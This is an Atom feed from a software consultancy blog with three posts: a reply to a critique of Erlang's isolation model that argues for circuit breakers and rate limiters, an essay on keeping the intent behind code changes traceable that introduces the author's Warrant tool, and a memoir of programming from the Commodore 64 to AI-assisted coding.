<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet href="/blog/feed.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom">


# HappiHacking Blog
  <subtitle>Helpful Hieroglyphics</subtitle>
  <link href="https://happihacking.com/blog/feed.xml" rel="self"/>
  <link href="https://happihacking.com"/>
  <updated>2026-03-29T00:00:00Z</updated>
  <id>https://happihacking.com</id>
  <author>
    <name>Happi Hacking AB</name>
    <email>info@happihacking.com</email>
  </author>
  
  <entry>
    <title>The Shared State of Isolation.</title>
    <link href="https://happihacking.com/blog/posts/2026/the-erlang-isolation-trap/"/>
    <updated>2026-03-29T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2026/the-erlang-isolation-trap/</id>
    <summary>Why Systems Collapse Under Load (and How to Fix It)</summary>
    <content type="html">&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/gatekeeper_4.png&quot; alt=&quot;The Gatekeeper Gnome&quot; title=&quot;The Gatekeeper Gnome&quot; /&gt;&lt;/p&gt;
&lt;p&gt;A recent essay,
&lt;a href=&quot;https://causality.blog/essays/the-isolation-trap/&quot;&gt;&amp;quot;The Isolation Trap&amp;quot;&lt;/a&gt;,
argues that Erlang&#39;s isolation model has structural limits: deadlocks
from circular calls, unbounded mailboxes, and escape hatches like ETS.
The &lt;a href=&quot;https://news.ycombinator.com/item?id=47347920&quot;&gt;HN discussion&lt;/a&gt;
added production experience:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;quot;All the problems I&#39;ve had with Erlang have been related to full
mailboxes or having one process type handling too many kinds of
different messages.&amp;quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The critique has merit. Circular &lt;code&gt;gen_server:call&lt;/code&gt; chains can deadlock
(strict &lt;a href=&quot;https://happihacking.com/blog/posts/2025/process_archetypes/&quot;&gt;archetypes&lt;/a&gt; prevent this
by directing calls one way, down the supervision tree). The production
failures worth solving are more specific.&lt;/p&gt;
&lt;p&gt;In &lt;a href=&quot;https://happihacking.com/blog/posts/2025/the-gnome-village/&quot;&gt;The Gnome Village&lt;/a&gt; I wrote:
&amp;quot;Isolation contains damage. Sharing spreads it.&amp;quot; That holds for crashes.
Isolation does nothing about slowness. When hundreds of processes hit
the same degraded API, they fail independently and simultaneously. Each
gnome is an island. Islands that share a coastline flood together when the tide comes in.&lt;/p&gt;
&lt;p&gt;Three things break:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Correlated timeouts.&lt;/strong&gt; A slow dependency causes hundreds of
processes to time out at once.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Retry amplification.&lt;/strong&gt; Each timeout spawns a retry, multiplying
load on an already degraded system.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mailbox flooding.&lt;/strong&gt; Processes accumulate messages faster than they
drain them.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Once the perfect storm hits, even isolated islands flood. The illusion of perfect isolation shatters.&lt;/p&gt;
&lt;h2 id=&quot;three-gatekeepers&quot; tabindex=&quot;-1&quot;&gt;Three Gatekeepers&lt;/h2&gt;
&lt;p&gt;Consider a standard payment system under heavy load. To survive the flood, it needs a Gatekeeper at each failure point. Gatekeepers sit at domain boundaries where unbounded input meets bounded capacity. (See &lt;a href=&quot;https://happihacking.com/blog/posts/2025/process_archetypes/&quot;&gt;Process Archetypes&lt;/a&gt; for the full role taxonomy.)&lt;/p&gt;
&lt;p&gt;You can&#39;t stop the tide, but you can decide where the water is allowed to flow.&lt;/p&gt;
&lt;p&gt;A circuit breaker sits in front of the fraud API. When the dependency turns unreliable, the breaker trips after three consecutive failures, closes the gate, and starts exponential backoff. Callers get a fast, clear &lt;code&gt;{error, breaker_blocked}&lt;/code&gt; instead of another cascading timeout.&lt;/p&gt;
&lt;p&gt;A rate limiter on the worker pool uses a token bucket to cap concurrent requests, keeping the inflow below what the system can drain. When tokens are exhausted, callers immediately receive &lt;code&gt;{error, rate_limited}&lt;/code&gt;, avoiding queue buildup and unbounded memory growth.&lt;/p&gt;
&lt;p&gt;A sentinel (&lt;a href=&quot;https://happihacking.com/blog/posts/2025/observers/&quot;&gt;Observer&lt;/a&gt;) watches the water level. It monitors the worker group, and when failure rates cross a threshold, it alerts the payment coordinator to switch to a fallback path before the system collapses.&lt;/p&gt;
&lt;p&gt;None of these patterns require shared mutable state. They use OTP primitives that already exist: gen_server state machines, supervisor restart budgets, and process monitors.&lt;/p&gt;
&lt;h2 id=&quot;the-serialization-objection&quot; tabindex=&quot;-1&quot;&gt;The Serialization Objection&lt;/h2&gt;
&lt;p&gt;The essay claims that when a process mailbox becomes a bottleneck, teams invariably reach for ETS, reintroducing the shared state that isolation was supposed to prevent.&lt;/p&gt;
&lt;p&gt;But mailbox bottlenecks usually signal role confusion, not an inherent flaw in message passing. A &lt;a href=&quot;https://happihacking.com/blog/posts/2025/resource_owners/&quot;&gt;Resource Owner&lt;/a&gt; that only holds state and answers questions can handle messages in microseconds. It serves thousands of &lt;a href=&quot;https://happihacking.com/blog/posts/2025/workers/&quot;&gt;Workers&lt;/a&gt; without a backlog.&lt;/p&gt;
&lt;p&gt;It is only when that same process also calls databases, formats responses, and logs metrics that it backs up. Split those roles, and the serialized path stays fast. If demand still exceeds capacity, a Gatekeeper bounds the load long before anyone needs to reach for ETS.&lt;/p&gt;
&lt;p&gt;ETS, &lt;code&gt;persistent_term&lt;/code&gt;, and &lt;code&gt;atomics&lt;/code&gt; certainly have legitimate uses. A counter for metrics collection is a controlled, pragmatic relaxation of the model. As one HN commenter put it:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;quot;Message passing is a way of constraining shared memory to the point where it&#39;s possible for humans to reason about most of the time.&amp;quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&quot;full-circle&quot; tabindex=&quot;-1&quot;&gt;Full Circle&lt;/h2&gt;
&lt;p&gt;When a well-designed system faces the same traffic spike, the outcome changes. The system stays responsive, and the failure remains local rather than spreading across the whole system.&lt;/p&gt;
&lt;p&gt;If you are building systems that handle money, or any other critical load, follow these three rules:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Put a &lt;a href=&quot;https://happihacking.com/blog/posts/2025/gatekeepers/&quot;&gt;circuit breaker&lt;/a&gt; in front of
every external dependency.&lt;/li&gt;
&lt;li&gt;Limit concurrency on every worker pool that calls external services.&lt;/li&gt;
&lt;li&gt;Define &lt;a href=&quot;https://happihacking.com/blog/posts/2025/flows-keep-work-moving/&quot;&gt;backpressure contracts&lt;/a&gt;
at every domain boundary.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Isolation gives you crash containment for free, but nothing is truly isolated. To survive slowness and load, you need a good architecture and solid building blocks. That is exactly what domains, flows, and process archetypes provide.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/GoldenGate.JPG&quot; alt=&quot;Golden Gate Bridge&quot; title=&quot;Bridges between isolated islands&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Under the Golden Gate, the water moves fast because the channel is narrow. Systems behave the same way. Constrain the flow, and you get predictable movement. Remove the constraint, and the same water spreads out, slows down, and piles up elsewhere.&lt;/p&gt;
&lt;h2 id=&quot;references&quot; tabindex=&quot;-1&quot;&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://causality.blog/essays/the-isolation-trap/&quot;&gt;&amp;quot;The Isolation Trap&amp;quot;&lt;/a&gt; by zapwalrus (causality.blog). The essay this post responds to.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://news.ycombinator.com/item?id=47347920&quot;&gt;HN discussion&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;series-gnomes-domains-and-flows&quot; tabindex=&quot;-1&quot;&gt;Series: Gnomes, Domains, and Flows&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/the-gnome-village/&quot;&gt;The Gnome Village&lt;/a&gt; — processes, isolation, scheduling&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/supervisors-are-managers/&quot;&gt;Supervisors Are Managers&lt;/a&gt; — restart strategies, supervision trees&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows/&quot;&gt;Gnomes, Domains, and Flows&lt;/a&gt; — processes + domains + flows&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/domains-own-code-and-data/&quot;&gt;Domains Own Code and Data&lt;/a&gt; — domain boundaries, failure domain grouping&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/flows-keep-work-moving/&quot;&gt;Flows Keep Work Moving&lt;/a&gt; — backpressure contracts, four flow types&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/gnomes-domains-flows-putting-it-together/&quot;&gt;Putting It Together&lt;/a&gt; — payments walkthrough&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id=&quot;series-process-archetypes&quot; tabindex=&quot;-1&quot;&gt;Series: Process Archetypes&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/process_archetypes/&quot;&gt;Process Archetypes&lt;/a&gt; — the five roles&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/workers/&quot;&gt;Workers&lt;/a&gt; — one job, pools, fan-out&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/resource_owners/&quot;&gt;Resource Owners&lt;/a&gt; — entity owners, aggregators&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/routers/&quot;&gt;Routers&lt;/a&gt; — direction, no flow control&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/gatekeepers/&quot;&gt;Gatekeepers&lt;/a&gt; — circuit breakers, rate limiters, flow controllers&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2025/observers/&quot;&gt;Observers&lt;/a&gt; — sentinels, supervisors&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;For a deeper look at how the BEAM implements processes, heaps, message
passing, scheduling, and garbage collection, see
&lt;a href=&quot;https://happihacking.com/resources/the-beam-book/&quot;&gt;The BEAM Book&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Your Code Has No Memory</title>
    <link href="https://happihacking.com/blog/posts/2026/your-code-has-no-memory/"/>
    <updated>2026-03-26T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2026/your-code-has-no-memory/</id>
    <summary>From code change to intent, there and back again</summary>
    <content type="html">&lt;p&gt;Many teams can answer what a piece of code does, but far fewer can explain why it exists, what constraint shaped it, which tradeoff led to it, and whether that reasoning still holds, and that gap matters more now because we produce and change code at a pace where the loss of shared understanding is easy to miss until something important breaks.&lt;/p&gt;
&lt;h2 id=&quot;source-code-has-no-memory&quot; tabindex=&quot;-1&quot;&gt;Source code has no memory&lt;/h2&gt;
&lt;p&gt;We store source code, commits, pull requests, tickets, and documents, and over time the connections between them stop holding because they are not captured in a way that survives normal development, so branches disappear, tickets move between systems, pull requests capture moments of discussion, and months later the code remains while the reasoning has dissolved into fragments.&lt;/p&gt;
&lt;p&gt;This is why a system can look healthy in the metrics we watch and still feel risky to change, since the tests pass, the linter is happy, the modules are named sensibly, and yet no one wants to touch the part that matters because the team no longer remembers which constraints were deliberate and which behaviors are accidental.&lt;/p&gt;
&lt;p&gt;Margaret-Anne Storey describes this well in &lt;a href=&quot;https://arxiv.org/abs/2603.22106&quot;&gt;a recent paper&lt;/a&gt; and &lt;a href=&quot;https://www.linkedin.com/posts/margaret-anne-storey_we-have-many-tools-to-measure-the-quality-share-7442442974422036480-zQ0H/&quot;&gt;a related post&lt;/a&gt;, noting that we have many tools to measure code quality and very few ways to tell whether a team still understands the system or remembers why it was built that way, and that framing is useful because it gives a name to something many teams experience without quite being able to describe it.&lt;/p&gt;
&lt;h2 id=&quot;it-is-not-just-technical-debt&quot; tabindex=&quot;-1&quot;&gt;It is not just technical debt&lt;/h2&gt;
&lt;p&gt;Technical debt still matters, since shortcuts accumulate interest and poor structure slows future work, though it only describes the state of the code and says much less about the state of understanding or the availability of the rationale that should guide change.&lt;/p&gt;
&lt;p&gt;Storey&#39;s terms help here, where cognitive debt is the erosion of shared understanding and intent debt is the absence of explicit rationale, goals, and constraints, and the distinction matters because a codebase can be tidy and still be expensive to change when the team no longer shares a reliable model of how it works or what it is trying to preserve.&lt;/p&gt;
&lt;p&gt;That is the failure mode I see most often, where messy code is visible and the deeper issue is that the theory of the system becomes unevenly distributed and the reasons behind earlier decisions were never captured in a form later developers can trust, so every change starts with reconstruction, and reconstruction is slow, error-prone, and rarely visible on a sprint board.&lt;/p&gt;
&lt;p&gt;I see the same pattern in agentic development, where an agent can get stuck changing code back and forth, or move in a circle of revisions, because it does not understand why the code changed the last time. When the reason for a change is missing, the agent can still produce plausible edits, but it has no reliable way to tell whether it is preserving an intended constraint or undoing it by accident.&lt;/p&gt;
&lt;h2 id=&quot;we-try-to-fix-it-with-process&quot; tabindex=&quot;-1&quot;&gt;We try to fix it with process&lt;/h2&gt;
&lt;p&gt;Most teams have mechanisms that look like solutions, with tickets, commits, pull requests, and internal docs, and while all of these can help, they rarely preserve why a specific change exists in a durable way.&lt;/p&gt;
&lt;p&gt;The link between these artifacts and the code is weak and optional, so tickets drift away, commit messages compress context, pull requests optimize for approval rather than rationale, and traceability turns into archaeology where the story can be reconstructed only with time and the right people.&lt;/p&gt;
&lt;p&gt;That is not a workable model.&lt;/p&gt;
&lt;h2 id=&quot;there-is-a-real-debate-here&quot; tabindex=&quot;-1&quot;&gt;There is a real debate here&lt;/h2&gt;
&lt;p&gt;There is a real debate here, since some argue that documenting intent costs more than it gives back, especially when documentation becomes stale, and prefer to rely on code and tests while making changes based on present needs.&lt;/p&gt;
&lt;p&gt;That criticism lands because much documentation is performative, with large documents that stop matching reality and create the appearance of control without helping decisions, and if that is the alternative then skepticism makes sense.&lt;/p&gt;
&lt;p&gt;The useful middle ground is to capture rationale when it becomes concrete, since a short decision record, a task file with intent and constraints, or a merge-time summary tied to the change carries more value than large upfront documentation that quickly diverges.&lt;/p&gt;
&lt;h2 id=&quot;this-is-starting-to-matter&quot; tabindex=&quot;-1&quot;&gt;This is starting to matter&lt;/h2&gt;
&lt;p&gt;This matters more now because AI-assisted development increases output faster than understanding can be built, since manual work forces cognitive effort that builds a model of the system while generated implementations still require that understanding and often leave the team with less of it than the output suggests.&lt;/p&gt;
&lt;p&gt;The risk shifts from code quality alone to understanding and rationale, where teams can ship for a while and the cost shows up later during maintenance, onboarding, incidents, or audits.&lt;/p&gt;
&lt;p&gt;This is especially visible in regulated environments, where you must explain what changed, who approved it, and why it was done, often for a specific change, and while teams can produce that answer, they do it by searching across systems because rationale is treated as residue instead of part of the change.&lt;/p&gt;
&lt;h2 id=&quot;what-is-missing&quot; tabindex=&quot;-1&quot;&gt;What is missing&lt;/h2&gt;
&lt;p&gt;What is missing is a property of the system itself, where a codebase should let you move from a line of code to the change that introduced it, to the unit of work that authorized it, and to the intent that made it reasonable at the time.&lt;/p&gt;
&lt;p&gt;At a minimum, the chain looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;code
  &amp;lt;- commit
    &amp;lt;- task
      &amp;lt;- intent
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Teams need a stable route from implementation back to reason, since without it every important question starts from scratch.&lt;/p&gt;
&lt;p&gt;That applies to both teams and AI agents, because both need a stable route from implementation back to reason, from code change to intent.&lt;/p&gt;
&lt;h2 id=&quot;a-minimal-model&quot; tabindex=&quot;-1&quot;&gt;A minimal model&lt;/h2&gt;
&lt;p&gt;The model can stay small, where each change carries a task identifier and a short statement of intent, branches and commits carry that identifier, tasks live close to the repository, and important decisions are captured in short ADR-style records, allowing tools to reconstruct the trace without relying on memory.&lt;/p&gt;
&lt;p&gt;The format matters less than timing and discipline, since the reason needs to be captured while it is still available and in a form that survives time, which is why short decision records written at the moment of choice remain practical.&lt;/p&gt;
&lt;p&gt;Shared understanding should be treated as a deliverable, since teams already allocate time for code and tests because those artifacts matter later, and rationale deserves the same treatment in a lighter form because future work depends on it in the same way.&lt;/p&gt;
&lt;h2 id=&quot;in-practice&quot; tabindex=&quot;-1&quot;&gt;In practice&lt;/h2&gt;
&lt;p&gt;In practice this needs to live close to the code, so when reading a file the question becomes whether the code can lead you back to the task, the intent, and the decision that shaped it, which separates traceability as paperwork from traceability as a working property.&lt;/p&gt;
&lt;figure&gt;
  &lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/warrant-vscode-screen.png&quot; alt=&quot;Warrant VS Code extension showing the current task sidebar, inline blame annotations, and a trace panel for the selected task&quot; /&gt;
  &lt;figcaption&gt;The editor view stays close to the real traceability chain, because the sidebar shows the current task and task list, the inline annotations tie visible lines to task-linked commits, and the trace panel brings task intent, linked artifacts, and audit history into one place.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;p&gt;In Warrant, the VS Code extension follows simple conventions, reading task records from &lt;code&gt;.warrant/tasks/&lt;/code&gt;, inferring the current task from the branch, and using &lt;code&gt;git blame&lt;/code&gt; with task-linked commits to annotate lines, so the editor can show task context, intent, and history because the repository contains enough structured intent to reconstruct the story.&lt;/p&gt;
&lt;h2 id=&quot;one-important-constraint&quot; tabindex=&quot;-1&quot;&gt;One important constraint&lt;/h2&gt;
&lt;p&gt;The repository needs to remain the source of truth, so tasks, intent, and decisions travel with the code and cloning the repository gives both the system and the context needed to understand it, while external systems can still add value without being the only place where rationale lives.&lt;/p&gt;
&lt;h2 id=&quot;a-separate-concern-proof&quot; tabindex=&quot;-1&quot;&gt;A separate concern: proof&lt;/h2&gt;
&lt;p&gt;Some environments need independent proof that a change followed an approved path, and in those cases a separate service can observe commits and merges and record an append-only account, allowing the repository to hold the work while the external system acts as a witness.&lt;/p&gt;
&lt;p&gt;This avoids the trap where compliance systems own the work, since if the repository owns the work and the external service records events then you get evidence without moving the source of truth.&lt;/p&gt;
&lt;p&gt;This is the space I have been working on with Warrant, where each change carries a small task record with an ID, intent, and decision, and when it reaches &lt;code&gt;main&lt;/code&gt; the merge can be tied back to that task and optionally recorded in an append-only ledger.&lt;/p&gt;
&lt;p&gt;That reduces the failure mode where rationale disappears after the pull request is closed. The tool itself is narrow and Git-native, and the point is the same as in the editor view above: preserve the why while the team still knows it.&lt;/p&gt;
&lt;h2 id=&quot;what-this-changes&quot; tabindex=&quot;-1&quot;&gt;What this changes&lt;/h2&gt;
&lt;p&gt;The practical effect is small and noticeable, since debugging starts from intent instead of guesswork, audits become closer to queries, onboarding improves because reasoning is visible, and AI-generated code becomes easier to place inside a controlled workflow because constraints and decisions are explicit.&lt;/p&gt;
&lt;p&gt;More importantly, it means that when you come back to a piece of code and ask the question from the beginning, why does this exist, you are less likely to start from guesswork. Software systems need memory outside human recollection, since code stores behavior and Git stores change history while teams still need a durable way to store the reasons that connect one to the other. Without that, understanding erodes quietly and the system becomes harder to explain, evolve, and trust.&lt;/p&gt;
&lt;h2 id=&quot;if-you-want-to-try-it&quot; tabindex=&quot;-1&quot;&gt;If you want to try it&lt;/h2&gt;
&lt;p&gt;If you want to try it, start with a few conventions where task IDs are in branches and commits, short intent records live next to the code, and lightweight ADRs capture decisions with lasting consequences, since consistency matters more than tooling and if the chain from code to change to intent exists reliably then the system starts to retain memory instead of depending on whoever still remembers the story.&lt;/p&gt;
&lt;p&gt;If you&#39;re interested, you can find the current implementation in &lt;a href=&quot;https://github.com/happi/warrant&quot;&gt;the Warrant repository&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>The Late-Night Feeling of Wonder</title>
    <link href="https://happihacking.com/blog/posts/2026/the-late-night-feeling-of-wonder/"/>
    <updated>2026-03-16T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2026/the-late-night-feeling-of-wonder/</id>
    <content type="html">&lt;h1 id=&quot;the-late-night-feeling-of-wonder&quot; tabindex=&quot;-1&quot;&gt;The Late-Night Feeling of Wonder&lt;/h1&gt;
&lt;p&gt;In 1980 my ten years older sister started university and brought home a
TI-58 programmable calculator. I was ten years old. I found out you could
give it instructions and it would follow them. That was enough. I was done
for.&lt;/p&gt;
&lt;p&gt;Within a year I had convinced my parents to buy a VIC-20. I learned BASIC,
then 6502 assembler, because BASIC was too slow for what I wanted to do.
On an 8-bit machine the assembler is close enough to touch. You see exactly
what the CPU does, every register, every cycle. Then came the Commodore 64.&lt;/p&gt;
&lt;h2 id=&quot;the-c64-years&quot; tabindex=&quot;-1&quot;&gt;The C64 years&lt;/h2&gt;
&lt;p&gt;The C64 was the real playground. I would sit down at ten in the evening
thinking &amp;quot;I will just get this one thing working.&amp;quot; In Haparanda, in
northern Sweden, winter darkness arrives at three in the afternoon and
stays until nine the next morning. The screen was the only light in the
room. The world shrank to the keyboard and the monitor, and hours
disappeared. At three in the morning I would look up and realize school
started in five hours. It was not work or homework. I was still there
because I wanted to see what more the machine could do.&lt;/p&gt;
&lt;p&gt;I got pixels on the screen and learned to move them. I got sounds out of
the SID chip. I built text adventures, entire worlds made of words and
conditional logic. I started writing my own version of M.U.L.E., then my
own version of Elite. Neither was ever finished. Neither needed to be. At
some point I built a turtle robot, two wheels and a pen that could move
up and down, controlled from the C64. It drew circles on paper. Code that
reached into the physical world and left marks on it.&lt;/p&gt;
&lt;p&gt;Each project raised the stakes: calculator to screen to sound to worlds
to physical robots. I would discover a new capability and immediately
try to build five things with it. Most of them never got finished. The
joy was in the discovery that the machine would do what you told it to do.&lt;/p&gt;
&lt;h2 id=&quot;from-c64-to-compilers&quot; tabindex=&quot;-1&quot;&gt;From C64 to compilers&lt;/h2&gt;
&lt;p&gt;University extended the same feeling into deeper territory. At Uppsala I
studied computer science and later wrote a PhD on native code compilation
for Erlang. After that came a postdoc at EPFL, working on compiler design
and the early days of Scala. The loop was the same. Here is a machine. How
far can you push it?&lt;/p&gt;
&lt;p&gt;The academic years kept the discovery loop alive. You could spend months
on a single optimization pass, trying approaches that might not work,
measuring the results, trying again. The feedback was slower than the C64
sessions, measured in benchmark runs rather than pixels on a screen. The
underlying drive was the same: find out what the machine can do, then make
it do more.&lt;/p&gt;
&lt;p&gt;Some nights ended in a working optimization. Some nights ended in Unreal
Tournament.&lt;/p&gt;
&lt;h2 id=&quot;the-long-middle&quot; tabindex=&quot;-1&quot;&gt;The long middle&lt;/h2&gt;
&lt;p&gt;Then programming became my profession in a different sense. Over twenty
years I built systems for banks, telecom companies, and startups. Erlang,
distributed systems, the kind of software where reliability is not
optional. I learned the craft of building things that serve real users
under real constraints: architecture reviews, test coverage, deployment
pipelines, incident response. The discipline of engineering.&lt;/p&gt;
&lt;p&gt;The all-night sessions stopped. You do not stay up until three when you
have production systems to keep running and people depending on your
judgment the next morning. The joy got channeled into something more
measured and more useful.&lt;/p&gt;
&lt;p&gt;The late nights that remained were incidents. A live bug in a runtime
system, logs streaming, dashboards lighting up, people asking for updates.
Solving those problems can be satisfying. It is a different kind of
adrenaline. But it is not the same as staying up because a sprite finally
moved across the screen.&lt;/p&gt;
&lt;h2 id=&quot;the-old-blogs-knew&quot; tabindex=&quot;-1&quot;&gt;The old blogs knew&lt;/h2&gt;
&lt;p&gt;There is an interesting pattern if you read the old blogs from
&lt;a href=&quot;https://steve-yegge.blogspot.com/2006/03/execution-in-kingdom-of-nouns.html&quot;&gt;Steve Yegge&lt;/a&gt;,
&lt;a href=&quot;https://blog.codinghorror.com/the-first-rule-of-programming-its-always-your-fault/&quot;&gt;Jeff Atwood&lt;/a&gt;,
and &lt;a href=&quot;https://www.joelonsoftware.com/2001/02/12/human-task-switches-considered-harmful/&quot;&gt;Joel Spolsky&lt;/a&gt;
today. They were writing about why programming used to feel joyful, and
many of the things they described are suddenly becoming true again.&lt;/p&gt;
&lt;p&gt;In the early days the barrier between idea and code was small. A programmer
had a REPL, a compiler, a text editor, and curiosity. Yegge wrote huge
systems in scripting languages because it was fun. Joel built startups with
tiny teams. Atwood wrote Stack Overflow partly as a side project experiment.
You wrote code because you wanted to see what would happen.&lt;/p&gt;
&lt;p&gt;Then enterprise software happened. Frameworks on top of frameworks,
dependency graphs with thousands of packages, build pipelines that take
longer than a coffee break. You stopped writing programs and started
operating infrastructure. Yegge ranted about it. Atwood joked about it.
Joel turned it into business advice.&lt;/p&gt;
&lt;p&gt;If you step back, there is a strange cycle. The 1980s and 1990s: fast
feedback, experimentation, joy. The enterprise era, roughly 2000 to 2020:
heavy frameworks, process, infrastructure. The AI-assisted era, 2023
onward: fast feedback again. Joel wrote during phase two, often pointing
at the friction. In essays like &amp;quot;The Law of Leaky Abstractions,&amp;quot; &amp;quot;Things
You Should Never Do,&amp;quot; and &amp;quot;The Joel Test,&amp;quot; he kept returning to the same
principles: fast feedback loops, simple tools, programmers working in flow,
minimal friction between idea and running code. He never wrote about vibe
coding. He described the conditions that make it work.&lt;/p&gt;
&lt;h2 id=&quot;the-repl-is-back&quot; tabindex=&quot;-1&quot;&gt;The REPL is back&lt;/h2&gt;
&lt;p&gt;The cycle time between idea and running code is collapsing again. LLM
coding assistants, interactive notebooks, fast local tooling. The friction
Joel spent years complaining about is shrinking, and that is the real
reason people talk about vibe coding. It is not about laziness. It is
about latency, and latency kills creativity.&lt;/p&gt;
&lt;p&gt;Yegge made an observation years ago that still holds: great programmers
build systems that amplify curiosity, not systems that enforce process.
Languages like Lisp, Python, Erlang, and Smalltalk always had this
property. You can poke a running Erlang system, change it while it lives,
explore it. AI tools unintentionally recreate the same kind of environment.
Not perfectly. Enough to bring back the feeling of discovery.&lt;/p&gt;
&lt;p&gt;Joel once wrote that great programmers are dramatically more productive
than average ones. AI tools may end up amplifying exactly that effect. The
people who already loved exploring systems late at night will simply
explore much faster.&lt;/p&gt;
&lt;h2 id=&quot;the-return&quot; tabindex=&quot;-1&quot;&gt;The return&lt;/h2&gt;
&lt;p&gt;It came back in stages. In late 2022 I started a Java project by asking
ChatGPT questions and copying the answers into my editor. Clumsy, slow,
and still faster than writing boilerplate from scratch. By mid-2023 I
was doing the same with Erlang world generation code and ML model tuning.
The loop was: ask, copy, paste, fix, repeat.&lt;/p&gt;
&lt;p&gt;In 2024, Copilot moved into my editor and the loop tightened. I started
a life organizer in January, a productivity server in February with a
commit message that read &amp;quot;Add a ChatGPT connection,&amp;quot; an agent framework
in March. Four projects in eight weeks. I recognized the pattern
immediately: discover a new capability, start five things at once. The
C64 again.&lt;/p&gt;
&lt;p&gt;Then in June 2025, the third shift. I added a CLAUDE.md file to Solar
Frontiers, an Erlang game project that had been sitting at fourteen
commits over ten months.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://happihacking.com/images/blog/solar-frontiers-interface.png&quot; alt=&quot;Solar Frontiers gameplay interface showing the solar system map, probes, and research controls&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Solar Frontiers. An Erlang-powered strategy game. Fourteen commits in ten months, then six hundred and fifteen after adding AI to the workflow.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Since then Solar Frontiers alone has accumulated more than six hundred
commits. It was not an exception. In nine months of vibe coding across
my projects, the numbers add up to nearly three thousand commits and more
than a million lines of code written, roughly eleven commits a day.&lt;/p&gt;
&lt;p&gt;On the C64 I might have written fifty lines in an evening and felt like I
had conquered the world. The scale changed. The rhythm is back.&lt;/p&gt;
&lt;p&gt;By early 2026, the project list looked like this: a life organizer, a home
dashboard running on a Raspberry Pi with Nerves, a weekly menu generator
that automatically orders groceries from Mathem, a kids chore controller,
a door controller for the house, Modbus integrations to the Nibe heat pump
and the FTX ventilation system, a voice pipeline prototype, a book library
app, LAN party tools for Unreal Tournament, a gaming monitor, a Discord
bot. Compare that to the C64 list: text adventures, M.U.L.E. clone, Elite
clone, turtle robot. Same pattern. Ambitious, broad, driven by curiosity.&lt;/p&gt;
&lt;p&gt;The difference is speed. On the C64 it took weeks to get sprites moving.
With AI tools you can have a working dashboard in an evening. The feeling
is the same.&lt;/p&gt;
&lt;h2 id=&quot;a-note-on-production&quot; tabindex=&quot;-1&quot;&gt;A note on production&lt;/h2&gt;
&lt;p&gt;I would not push vibe-coded software to a fintech production system today.
The quality is not there for high-stakes systems. I believe the improvements
have been exponential since the 1940s. The early part of an exponential
curve looks flat, and the flat part lasted long enough that several
generations of researchers concluded AI was permanently limited. The late
part looks vertical, and we are entering it now. That is a topic for
another post.&lt;/p&gt;
&lt;p&gt;There are also harder questions around AI-assisted development: training
data, copyright, security risks, and the occasional spectacular failure
when a model confidently deletes the wrong database. Those questions
deserve serious discussion. This essay is about something simpler: why
the machine suddenly feels interesting again.&lt;/p&gt;
&lt;h2 id=&quot;the-same-feeling&quot; tabindex=&quot;-1&quot;&gt;The same feeling&lt;/h2&gt;
&lt;p&gt;The turtle robot drew circles on paper. The door controller opens the
front door. Code reaching into the physical world, same feeling, forty
years apart. The unfinished M.U.L.E. clone and the ever-growing Aurora
life organizer. Same &amp;quot;I will just...&amp;quot; at ten in the evening. Same &amp;quot;school
in five hours&amp;quot; at three in the morning, except now it is &amp;quot;meeting in five
hours.&amp;quot;&lt;/p&gt;
&lt;p&gt;The thing that got me into programming is still here. It just needed a new
form. Even in Stockholm, in the winter, the darkness outside makes the
screen feel like the whole universe.&lt;/p&gt;
